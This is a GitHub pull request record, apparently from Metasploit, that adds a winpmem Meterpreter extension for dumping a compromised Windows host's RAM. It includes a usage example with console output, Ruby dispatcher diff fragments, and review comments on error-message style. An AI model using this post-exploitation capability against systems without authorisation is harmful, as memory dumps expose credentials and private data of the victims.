### PR TITLE
Winpmem meterpreter extension

### PR DESCRIPTION
**Pull request by danilbaz**
Add a winpmem meterpreter extension to dump victim's RAM.

Must be used with https://github.com/rapid7/metasploit-payloads/pull/112

Example of use:

```
meterpreter > load winpmem
Loading extension winpmem...success.
meterpreter > dump_ram /tmp/dump_ram.raw
[+] Driver PMEM loaded successfully
[+] 10% Downloaded
[+] 20% Downloaded
[+] 30% Downloaded
[+] 40% Downloaded
[+] 50% Downloaded
[+] 60% Downloaded
[+] 70% Downloaded
[+] 80% Downloaded
[+] 90% Downloaded
[*] Download completed
[*] Unloading driver
```

### CODE REVIEW

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb [hunk 1]
```diff
@@ -0,0 +1,90 @@
...
+    WINPMEM_ERROR_SUCCESS = 0
+    WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
+    WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
+    WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
+    WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
+    WINPMEM_ERROR_UNKNOWN = 255
+
+    def cmd_dump_ram(*args)
+      unless args[0]
+        print_error("Usage: dump_ram [raw-memory-file]")
```
Comment (void-in) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb]: I think this should be:
```
Usage: dump_ram [output file]
```

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb [hunk 2]
```diff
@@ -0,0 +1,90 @@
...
+        return
+      end
+      path_raw = args[0]
+
+      fd = ::File.new(path_raw, 'wb+')
+      memory_size, response_code, channel = client.winpmem.dump_ram
+      case response_code
+      when WINPMEM_ERROR_FAILED_LOAD_DRIVER
+        print_bad("Failed to load the driver")
```
Comment (void-in) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb]: print_bad should be changed to print_error

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb [hunk 3]
```diff
@@ -0,0 +1,90 @@
...
+        return true
+      when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
+        print_bad("Failed to get the memory geometry")
```
Comment (void-in) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb]: print_bad should be changed to print_error

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb [hunk 4]
```diff
@@ -0,0 +1,90 @@
...
+        return true
+      when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
+        print_bad("Failed to allocate memory")
```
Comment (void-in) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb]: print_bad should be changed to print_error

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb [hunk 5]
```diff
@@ -0,0 +1,90 @@
...
+        return true
+      when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
+        print_bad("Failed to open the meterpreter Channel")
```
Comment (void-in) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb]: print_bad should be changed to print_error

**Comment by h00die** [comment]
Some docs would be awesome for this. The msf side would be boring I'd assume, but showing a follow-on grep for something would be neat to see

**Comment by wwebb-r7** [comment]
Tested, works great.

**Comment by tdoan-r7** [comment]
# Release Notes

A winpmem meterpreter extension has been added to dump a victim's RAM.

**Pull request merged**